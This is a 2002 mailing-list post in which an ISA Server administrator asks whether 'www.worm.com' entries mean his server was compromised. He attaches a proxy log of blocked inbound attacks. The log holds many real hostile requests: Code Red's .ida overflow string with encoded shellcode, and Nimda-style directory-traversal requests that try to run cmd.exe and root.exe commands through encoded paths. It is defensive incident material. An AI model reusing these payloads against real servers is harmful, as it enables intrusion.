www.worm.com in ISA Logs

  • From: Morvan Daniel Muller <morvan@xxxxxxxxxxxxxxx>
  • To: isalist@xxxxxxxxxxxxx
  • Date: Wed, 20 Feb 2002 18:39:22 -0300

Hello!

I found in my ISA Logs "www.worm.com" ... 

Does it mean that my ISA box was compromised, or was used to attack other machines
on the internet?

Log attached "WEBEXTD20020212.log" - 26 Kbytes.

PS:
Server99 is my ISA box's hostname!
On my ISA box, I have ISA sp1 applied and the last patch
"w2kSP2SRollUPack1.exe" for win2000 server. 


Morvan.
#Software: Microsoft(R) Internet Security and Acceleration Server 2000
#Version: 1.0
#Date: 2002-02-12 06:58:14
#Fields: c-ip   cs-username     c-agent sc-authenticated        date    time    
s-svcname       s-computername  cs-referred     r-host  r-ip    r-port  
time-taken      cs-bytes        sc-bytes        cs-protocol     s-operation     
cs-uri  cs-mime-type    s-object-source sc-status       s-cache-info    rule#1  
rule#2
24.102.165.126  anonymous       -       N       2002-02-12      06:58:14        
W3ReverseProxy  SERVER99        -       www.worm.com    -       -       18086   
4039    -       -       GET     
http://www.worm.com/default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a
      -       -       12202   0x0     Default rule    -
24.158.221.198  anonymous       -       N       2002-02-12      07:23:27        
W3ReverseProxy  SERVER99        -       www.worm.com    -       -       18377   
4039    -       -       GET     
http://www.worm.com/default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a
      -       -       12202   0x0     Default rule    -
200.247.198.140 anonymous       -       N       2002-02-12      13:30:40        
W3ReverseProxy  SERVER99        -       www     -       -       10      72      
-       -       GET     http://www/scripts/root.exe?/c+dir      -       -       
12202   0x0     Default rule    -
200.247.198.140 anonymous       -       N       2002-02-12      13:30:49        
W3ReverseProxy  SERVER99        -       www     -       -       -       70      
-       -       GET     http://www/MSADC/root.exe?/c+dir        -       -       
12202   0x0     Default rule    -
200.247.198.140 anonymous       -       N       2002-02-12      13:30:56        
W3ReverseProxy  SERVER99        -       www     -       -       -       80      
-       -       GET     http://www/c/winnt/system32/cmd.exe?/c+dir      -       
-       12202   0x0     Default rule    -
200.247.198.140 anonymous       -       N       2002-02-12      13:31:04        
W3ReverseProxy  SERVER99        -       www     -       -       -       80      
-       -       GET     http://www/d/winnt/system32/cmd.exe?/c+dir      -       
-       12202   0x0     Default rule    -
200.247.198.140 anonymous       -       N       2002-02-12      13:31:11        
W3ReverseProxy  SERVER99        -       www     -       -       -       96      
-       -       GET     
http://www/scripts/..%255c../winnt/system32/cmd.exe?/c+dir      -       -       
12202   0x0     Default rule    -
200.247.198.140 anonymous       -       N       2002-02-12      13:31:20        
W3ReverseProxy  SERVER99        -       www     -       -       -       117     
-       -       GET     
http://www/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir 
-       -       12202   0x0     Default rule    -
200.247.198.140 anonymous       -       N       2002-02-12      14:02:34        
W3ReverseProxy  SERVER99        -       www     -       -       -       72      
-       -       GET     http://www/scripts/root.exe?/c+dir      -       -       
12202   0x0     Default rule    -
200.247.198.140 anonymous       -       N       2002-02-12      14:02:45        
W3ReverseProxy  SERVER99        -       www     -       -       -       70      
-       -       GET     http://www/MSADC/root.exe?/c+dir        -       -       
12202   0x0     Default rule    -
200.247.198.140 anonymous       -       N       2002-02-12      14:02:55        
W3ReverseProxy  SERVER99        -       www     -       -       -       80      
-       -       GET     http://www/c/winnt/system32/cmd.exe?/c+dir      -       
-       12202   0x0     Default rule    -
200.247.198.140 anonymous       -       N       2002-02-12      14:03:06        
W3ReverseProxy  SERVER99        -       www     -       -       -       80      
-       -       GET     http://www/d/winnt/system32/cmd.exe?/c+dir      -       
-       12202   0x0     Default rule    -
200.247.198.140 anonymous       -       N       2002-02-12      14:03:17        
W3ReverseProxy  SERVER99        -       www     -       -       -       96      
-       -       GET     
http://www/scripts/..%255c../winnt/system32/cmd.exe?/c+dir      -       -       
12202   0x0     Default rule    -
200.247.198.140 anonymous       -       N       2002-02-12      14:03:27        
W3ReverseProxy  SERVER99        -       www     -       -       -       117     
-       -       GET     
http://www/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir 
-       -       12202   0x0     Default rule    -
200.247.198.140 anonymous       -       N       2002-02-12      14:03:40        
W3ReverseProxy  SERVER99        -       www     -       -       -       117     
-       -       GET     
http://www/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir 
-       -       12202   0x0     Default rule    -
200.247.198.140 anonymous       -       N       2002-02-12      14:03:48        
W3ReverseProxy  SERVER99        -       www     -       -       10      145     
-       -       GET     
http://www/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
     -       -       12202   0x0     Default rule    -
200.247.198.140 anonymous       -       N       2002-02-12      14:04:08        
W3ReverseProxy  SERVER99        -       www     -       -       -       97      
-       -       GET     
http://www/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir     -       -       
12202   0x0     Default rule    -
200.247.198.140 anonymous       -       N       2002-02-12      14:04:17        
W3ReverseProxy  SERVER99        -       www     -       -       -       97      
-       -       GET     
http://www/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir     -       -       
12202   0x0     Default rule    -
200.247.198.140 anonymous       -       N       2002-02-12      14:04:26        
W3ReverseProxy  SERVER99        -       www     -       -       -       97      
-       -       GET     
http://www/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir     -       -       
12202   0x0     Default rule    -
200.247.198.140 anonymous       -       N       2002-02-12      14:04:36        
W3ReverseProxy  SERVER99        -       www     -       -       -       97      
-       -       GET     
http://www/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir     -       -       
12202   0x0     Default rule    -
200.247.198.140 anonymous       -       N       2002-02-12      14:04:46        
W3ReverseProxy  SERVER99        -       www     -       -       -       98      
-       -       GET     
http://www/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir    -       -       
12005   0x0     -       -
200.247.198.140 anonymous       -       N       2002-02-12      14:04:56        
W3ReverseProxy  SERVER99        -       www     -       -       -       96      
-       -       GET     
http://www/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir      -       -       
12005   0x0     -       -
200.247.198.140 anonymous       -       N       2002-02-12      14:05:04        
W3ReverseProxy  SERVER99        -       www     -       -       -       100     
-       -       GET     
http://www/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir  -       -       
12202   0x0     Default rule    -
200.247.198.140 anonymous       -       N       2002-02-12      14:05:13        
W3ReverseProxy  SERVER99        -       www     -       -       10      96      
-       -       GET     
http://www/scripts/..%252f../winnt/system32/cmd.exe?/c+dir      -       -       
12202   0x0     Default rule    -
200.247.198.140 anonymous       -       N       2002-02-12      14:13:49        
W3ReverseProxy  SERVER99        -       www     -       -       -       72      
-       -       GET     http://www/scripts/root.exe?/c+dir      -       -       
12202   0x0     Default rule    -
200.11.200.148  anonymous       -       N       2002-02-12      14:26:02        
W3ReverseProxy  SERVER99        -       www     -       -       -       72      
-       -       GET     http://www/scripts/root.exe?/c+dir      -       -       
12202   0x0     Default rule    -
200.11.200.148  anonymous       -       N       2002-02-12      14:26:06        
W3ReverseProxy  SERVER99        -       www     -       -       -       70      
-       -       GET     http://www/MSADC/root.exe?/c+dir        -       -       
12202   0x0     Default rule    -
200.11.200.148  anonymous       -       N       2002-02-12      14:26:09        
W3ReverseProxy  SERVER99        -       www     -       -       -       80      
-       -       GET     http://www/c/winnt/system32/cmd.exe?/c+dir      -       
-       12202   0x0     Default rule    -
200.11.200.148  anonymous       -       N       2002-02-12      14:26:15        
W3ReverseProxy  SERVER99        -       www     -       -       -       80      
-       -       GET     http://www/d/winnt/system32/cmd.exe?/c+dir      -       
-       12202   0x0     Default rule    -
200.11.200.148  anonymous       -       N       2002-02-12      14:26:19        
W3ReverseProxy  SERVER99        -       www     -       -       -       96      
-       -       GET     
http://www/scripts/..%255c../winnt/system32/cmd.exe?/c+dir      -       -       
12202   0x0     Default rule    -
200.11.200.148  anonymous       -       N       2002-02-12      14:26:25        
W3ReverseProxy  SERVER99        -       www     -       -       -       117     
-       -       GET     
http://www/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir 
-       -       12202   0x0     Default rule    -
200.11.200.148  anonymous       -       N       2002-02-12      14:26:29        
W3ReverseProxy  SERVER99        -       www     -       -       -       117     
-       -       GET     
http://www/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir 
-       -       12202   0x0     Default rule    -
200.11.200.148  anonymous       -       N       2002-02-12      14:26:43        
W3ReverseProxy  SERVER99        -       www     -       -       -       145     
-       -       GET     
http://www/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
     -       -       12202   0x0     Default rule    -
200.11.200.148  anonymous       -       N       2002-02-12      14:26:50        
W3ReverseProxy  SERVER99        -       www     -       -       -       97      
-       -       GET     
http://www/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir     -       -       
12202   0x0     Default rule    -
200.11.200.148  anonymous       -       N       2002-02-12      14:26:54        
W3ReverseProxy  SERVER99        -       www     -       -       -       97      
-       -       GET     
http://www/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir     -       -       
12202   0x0     Default rule    -
200.11.200.148  anonymous       -       N       2002-02-12      14:26:57        
W3ReverseProxy  SERVER99        -       www     -       -       -       97      
-       -       GET     
http://www/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir     -       -       
12202   0x0     Default rule    -
200.11.200.148  anonymous       -       N       2002-02-12      14:27:02        
W3ReverseProxy  SERVER99        -       www     -       -       -       97      
-       -       GET     
http://www/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir     -       -       
12202   0x0     Default rule    -
200.11.200.148  anonymous       -       N       2002-02-12      14:27:06        
W3ReverseProxy  SERVER99        -       www     -       -       -       98      
-       -       GET     
http://www/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir    -       -       
12005   0x0     -       -
200.11.200.148  anonymous       -       N       2002-02-12      14:27:17        
W3ReverseProxy  SERVER99        -       www     -       -       -       96      
-       -       GET     
http://www/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir      -       -       
12005   0x0     -       -
200.11.200.148  anonymous       -       N       2002-02-12      14:27:20        
W3ReverseProxy  SERVER99        -       www     -       -       -       100     
-       -       GET     
http://www/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir  -       -       
12202   0x0     Default rule    -
200.11.200.148  anonymous       -       N       2002-02-12      14:27:26        
W3ReverseProxy  SERVER99        -       www     -       -       -       96      
-       -       GET     
http://www/scripts/..%252f../winnt/system32/cmd.exe?/c+dir      -       -       
12202   0x0     Default rule    -
200.247.198.140 anonymous       -       N       2002-02-12      14:48:32        
W3ReverseProxy  SERVER99        -       www     -       -       -       72      
-       -       GET     http://www/scripts/root.exe?/c+dir      -       -       
12202   0x0     Default rule    -
200.247.198.140 anonymous       -       N       2002-02-12      14:48:37        
W3ReverseProxy  SERVER99        -       www     -       -       -       70      
-       -       GET     http://www/MSADC/root.exe?/c+dir        -       -       
12202   0x0     Default rule    -
200.247.198.140 anonymous       -       N       2002-02-12      14:48:42        
W3ReverseProxy  SERVER99        -       www     -       -       10      80      
-       -       GET     http://www/c/winnt/system32/cmd.exe?/c+dir      -       
-       12202   0x0     Default rule    -
200.247.198.140 anonymous       -       N       2002-02-12      14:48:49        
W3ReverseProxy  SERVER99        -       www     -       -       -       80      
-       -       GET     http://www/d/winnt/system32/cmd.exe?/c+dir      -       
-       12202   0x0     Default rule    -
200.247.198.140 anonymous       -       N       2002-02-12      14:48:57        
W3ReverseProxy  SERVER99        -       www     -       -       -       96      
-       -       GET     
http://www/scripts/..%255c../winnt/system32/cmd.exe?/c+dir      -       -       
12202   0x0     Default rule    -
200.247.198.140 anonymous       -       N       2002-02-12      14:49:06        
W3ReverseProxy  SERVER99        -       www     -       -       -       117     
-       -       GET     
http://www/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir 
-       -       12202   0x0     Default rule    -
200.247.198.140 anonymous       -       N       2002-02-12      14:49:17        
W3ReverseProxy  SERVER99        -       www     -       -       -       117     
-       -       GET     
http://www/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir 
-       -       12202   0x0     Default rule    -
200.247.198.140 anonymous       -       N       2002-02-12      14:49:28        
W3ReverseProxy  SERVER99        -       www     -       -       -       145     
-       -       GET     
http://www/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
     -       -       12202   0x0     Default rule    -
200.48.238.12   anonymous       -       N       2002-02-12      15:01:09        
W3ReverseProxy  SERVER99        -       www     -       -       -       72      
-       -       GET     http://www/scripts/root.exe?/c+dir      -       -       
12202   0x0     Default rule    -
200.48.238.12   anonymous       -       N       2002-02-12      15:01:12        
W3ReverseProxy  SERVER99        -       www     -       -       -       70      
-       -       GET     http://www/MSADC/root.exe?/c+dir        -       -       
12202   0x0     Default rule    -
200.48.238.12   anonymous       -       N       2002-02-12      15:01:16        
W3ReverseProxy  SERVER99        -       www     -       -       -       80      
-       -       GET     http://www/c/winnt/system32/cmd.exe?/c+dir      -       
-       12202   0x0     Default rule    -
200.48.238.12   anonymous       -       N       2002-02-12      15:01:19        
W3ReverseProxy  SERVER99        -       www     -       -       -       80      
-       -       GET     http://www/d/winnt/system32/cmd.exe?/c+dir      -       
-       12202   0x0     Default rule    -
200.48.238.12   anonymous       -       N       2002-02-12      15:01:23        
W3ReverseProxy  SERVER99        -       www     -       -       -       96      
-       -       GET     
http://www/scripts/..%255c../winnt/system32/cmd.exe?/c+dir      -       -       
12202   0x0     Default rule    -
200.48.238.12   anonymous       -       N       2002-02-12      15:01:26        
W3ReverseProxy  SERVER99        -       www     -       -       -       117     
-       -       GET     
http://www/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir 
-       -       12202   0x0     Default rule    -
200.48.238.12   anonymous       -       N       2002-02-12      15:01:29        
W3ReverseProxy  SERVER99        -       www     -       -       -       117     
-       -       GET     
http://www/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir 
-       -       12202   0x0     Default rule    -
200.48.238.12   anonymous       -       N       2002-02-12      15:01:32        
W3ReverseProxy  SERVER99        -       www     -       -       -       145     
-       -       GET     
http://www/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
     -       -       12202   0x0     Default rule    -
200.190.217.30  anonymous       -       N       2002-02-12      15:20:56        
W3ReverseProxy  SERVER99        -       www     -       -       -       72      
-       -       GET     http://www/scripts/root.exe?/c+dir      -       -       
12202   0x0     Default rule    -
200.190.217.30  anonymous       -       N       2002-02-12      15:20:57        
W3ReverseProxy  SERVER99        -       www     -       -       -       70      
-       -       GET     http://www/MSADC/root.exe?/c+dir        -       -       
12202   0x0     Default rule    -
200.190.217.30  anonymous       -       N       2002-02-12      15:20:57        
W3ReverseProxy  SERVER99        -       www     -       -       -       80      
-       -       GET     http://www/c/winnt/system32/cmd.exe?/c+dir      -       
-       12202   0x0     Default rule    -
200.190.217.30  anonymous       -       N       2002-02-12      15:20:57        
W3ReverseProxy  SERVER99        -       www     -       -       -       80      
-       -       GET     http://www/d/winnt/system32/cmd.exe?/c+dir      -       
-       12202   0x0     Default rule    -
200.190.217.30  anonymous       -       N       2002-02-12      15:20:58        
W3ReverseProxy  SERVER99        -       www     -       -       -       96      
-       -       GET     
http://www/scripts/..%255c../winnt/system32/cmd.exe?/c+dir      -       -       
12202   0x0     Default rule    -
200.190.217.30  anonymous       -       N       2002-02-12      15:20:58        
W3ReverseProxy  SERVER99        -       www     -       -       -       117     
-       -       GET     
http://www/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir 
-       -       12202   0x0     Default rule    -
200.190.217.30  anonymous       -       N       2002-02-12      15:20:58        
W3ReverseProxy  SERVER99        -       www     -       -       -       117     
-       -       GET     
http://www/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir 
-       -       12202   0x0     Default rule    -
200.190.217.30  anonymous       -       N       2002-02-12      15:20:59        
W3ReverseProxy  SERVER99        -       www     -       -       10      145     
-       -       GET     
http://www/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
     -       -       12202   0x0     Default rule    -
200.190.217.30  anonymous       -       N       2002-02-12      15:20:59        
W3ReverseProxy  SERVER99        -       www     -       -       -       97      
-       -       GET     
http://www/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir     -       -       
12202   0x0     Default rule    -
200.190.217.30  anonymous       -       N       2002-02-12      15:21:00        
W3ReverseProxy  SERVER99        -       www     -       -       -       97      
-       -       GET     
http://www/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir     -       -       
12202   0x0     Default rule    -
200.190.217.30  anonymous       -       N       2002-02-12      15:21:01        
W3ReverseProxy  SERVER99        -       www     -       -       -       97      
-       -       GET     
http://www/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir     -       -       
12202   0x0     Default rule    -
200.190.217.30  anonymous       -       N       2002-02-12      15:21:02        
W3ReverseProxy  SERVER99        -       www     -       -       -       97      
-       -       GET     
http://www/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir     -       -       
12202   0x0     Default rule    -
200.190.217.30  anonymous       -       N       2002-02-12      15:21:02        
W3ReverseProxy  SERVER99        -       www     -       -       -       98      
-       -       GET     
http://www/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir    -       -       
12005   0x0     -       -
200.190.217.30  anonymous       -       N       2002-02-12      15:21:03        
W3ReverseProxy  SERVER99        -       www     -       -       -       96      
-       -       GET     
http://www/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir      -       -       
12005   0x0     -       -
200.190.217.30  anonymous       -       N       2002-02-12      15:21:04        
W3ReverseProxy  SERVER99        -       www     -       -       -       100     
-       -       GET     
http://www/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir  -       -       
12202   0x0     Default rule    -
200.190.217.30  anonymous       -       N       2002-02-12      15:21:05        
W3ReverseProxy  SERVER99        -       www     -       -       -       96      
-       -       GET     
http://www/scripts/..%252f../winnt/system32/cmd.exe?/c+dir      -       -       
12202   0x0     Default rule    -
218.65.190.138  anonymous       -       N       2002-02-12      17:03:08        
W3ReverseProxy  SERVER99        -       www.worm.com    -       -       18517   
4039    -       -       GET     
http://www.worm.com/default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a
      -       -       12202   0x0     Default rule    -
216.39.237.69   anonymous       -       N       2002-02-12      17:35:18        
W3ReverseProxy  SERVER99        -       www.worm.com    -       -       18447   
4039    -       -       GET     
http://www.worm.com/default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a
      -       -       12202   0x0     Default rule    -
134.59.27.31    anonymous       -       N       2002-02-12      18:26:06        
W3ReverseProxy  SERVER99        -       www.worm.com    -       -       18346   
4039    -       -       GET     
http://www.worm.com/default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a
      -       -       12202   0x0     Default rule    -
200.4.141.69    anonymous       -       N       2002-02-12      18:52:48        
W3ReverseProxy  SERVER99        -       www     -       -       -       72      
-       -       GET     http://www/scripts/root.exe?/c+dir      -       -       
12202   0x0     Default rule    -
200.4.141.69    anonymous       -       N       2002-02-12      18:52:50        
W3ReverseProxy  SERVER99        -       www     -       -       -       70      
-       -       GET     http://www/MSADC/root.exe?/c+dir        -       -       
12202   0x0     Default rule    -
200.4.141.69    anonymous       -       N       2002-02-12      18:52:53        
W3ReverseProxy  SERVER99        -       www     -       -       -       80      
-       -       GET     http://www/c/winnt/system32/cmd.exe?/c+dir      -       
-       12202   0x0     Default rule    -
200.4.141.69    anonymous       -       N       2002-02-12      18:52:59        
W3ReverseProxy  SERVER99        -       www     -       -       -       80      
-       -       GET     http://www/d/winnt/system32/cmd.exe?/c+dir      -       
-       12202   0x0     Default rule    -
200.4.141.69    anonymous       -       N       2002-02-12      18:53:02        
W3ReverseProxy  SERVER99        -       www     -       -       -       96      
-       -       GET     
http://www/scripts/..%255c../winnt/system32/cmd.exe?/c+dir      -       -       
12202   0x0     Default rule    -
200.4.141.69    anonymous       -       N       2002-02-12      18:53:08        
W3ReverseProxy  SERVER99        -       www     -       -       -       117     
-       -       GET     
http://www/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir 
-       -       12202   0x0     Default rule    -
200.4.141.69    anonymous       -       N       2002-02-12      18:53:11        
W3ReverseProxy  SERVER99        -       www     -       -       -       117     
-       -       GET     
http://www/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir 
-       -       12202   0x0     Default rule    -
200.4.141.69    anonymous       -       N       2002-02-12      18:53:14        
W3ReverseProxy  SERVER99        -       www     -       -       -       145     
-       -       GET     
http://www/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
     -       -       12202   0x0     Default rule    -
200.4.141.69    anonymous       -       N       2002-02-12      18:53:16        
W3ReverseProxy  SERVER99        -       www     -       -       -       97      
-       -       GET     
http://www/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir     -       -       
12202   0x0     Default rule    -
200.4.141.69    anonymous       -       N       2002-02-12      18:53:23        
W3ReverseProxy  SERVER99        -       www     -       -       -       97      
-       -       GET     
http://www/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir     -       -       
12202   0x0     Default rule    -
200.4.141.69    anonymous       -       N       2002-02-12      18:53:25        
W3ReverseProxy  SERVER99        -       www     -       -       -       97      
-       -       GET     
http://www/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir     -       -       
12202   0x0     Default rule    -
200.4.141.64    anonymous       -       N       2002-02-12      19:01:17        
W3ReverseProxy  SERVER99        -       www     -       -       -       72      
-       -       GET     http://www/scripts/root.exe?/c+dir      -       -       
12202   0x0     Default rule    -
200.4.141.64    anonymous       -       N       2002-02-12      19:01:20        
W3ReverseProxy  SERVER99        -       www     -       -       -       70      
-       -       GET     http://www/MSADC/root.exe?/c+dir        -       -       
12202   0x0     Default rule    -
200.4.141.64    anonymous       -       N       2002-02-12      19:01:23        
W3ReverseProxy  SERVER99        -       www     -       -       -       80      
-       -       GET     http://www/c/winnt/system32/cmd.exe?/c+dir      -       
-       12202   0x0     Default rule    -
200.4.141.64    anonymous       -       N       2002-02-12      19:01:28        
W3ReverseProxy  SERVER99        -       www     -       -       -       80      
-       -       GET     http://www/d/winnt/system32/cmd.exe?/c+dir      -       
-       12202   0x0     Default rule    -
200.4.141.64    anonymous       -       N       2002-02-12      19:01:31        
W3ReverseProxy  SERVER99        -       www     -       -       -       96      
-       -       GET     
http://www/scripts/..%255c../winnt/system32/cmd.exe?/c+dir      -       -       
12202   0x0     Default rule    -
200.4.141.64    anonymous       -       N       2002-02-12      19:01:34        
W3ReverseProxy  SERVER99        -       www     -       -       -       117     
-       -       GET     
http://www/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir 
-       -       12202   0x0     Default rule    -
200.4.141.64    anonymous       -       N       2002-02-12      19:01:49        
W3ReverseProxy  SERVER99        -       www     -       -       -       117     
-       -       GET     
http://www/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir 
-       -       12202   0x0     Default rule    -
200.4.141.64    anonymous       -       N       2002-02-12      19:01:52        
W3ReverseProxy  SERVER99        -       www     -       -       -       145     
-       -       GET     
http://www/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
     -       -       12202   0x0     Default rule    -
200.4.141.64    anonymous       -       N       2002-02-12      19:01:57        
W3ReverseProxy  SERVER99        -       www     -       -       -       97      
-       -       GET     
http://www/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir     -       -       
12202   0x0     Default rule    -
200.4.141.64    anonymous       -       N       2002-02-12      19:02:00        
W3ReverseProxy  SERVER99        -       www     -       -       -       97      
-       -       GET     
http://www/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir     -       -       
12202   0x0     Default rule    -
200.4.141.64    anonymous       -       N       2002-02-12      19:02:03        
W3ReverseProxy  SERVER99        -       www     -       -       -       97      
-       -       GET     
http://www/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir     -       -       
12202   0x0     Default rule    -
200.4.141.64    anonymous       -       N       2002-02-12      19:02:06        
W3ReverseProxy  SERVER99        -       www     -       -       -       97      
-       -       GET     
http://www/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir     -       -       
12202   0x0     Default rule    -
200.4.141.64    anonymous       -       N       2002-02-12      19:02:08        
W3ReverseProxy  SERVER99        -       www     -       -       -       98      
-       -       GET     
http://www/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir    -       -       
12005   0x0     -       -
200.4.141.64    anonymous       -       N       2002-02-12      19:02:11        
W3ReverseProxy  SERVER99        -       www     -       -       -       96      
-       -       GET     
http://www/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir      -       -       
12005   0x0     -       -
200.4.141.64    anonymous       -       N       2002-02-12      19:02:14        
W3ReverseProxy  SERVER99        -       www     -       -       -       100     
-       -       GET     
http://www/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir  -       -       
12202   0x0     Default rule    -
200.4.141.64    anonymous       -       N       2002-02-12      19:02:17        
W3ReverseProxy  SERVER99        -       www     -       -       -       96      
-       -       GET     
http://www/scripts/..%252f../winnt/system32/cmd.exe?/c+dir      -       -       
12202   0x0     Default rule    -
202.99.11.193   anonymous       -       N       2002-02-12      19:18:06        
W3ReverseProxy  SERVER99        -       www.worm.com    -       -       18517   
4039    -       -       GET     
http://www.worm.com/default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a
      -       -       12202   0x0     Default rule    -
200.168.121.104 anonymous       -       N       2002-02-12      21:14:09        
W3ReverseProxy  SERVER99        -       www     -       -       -       72      
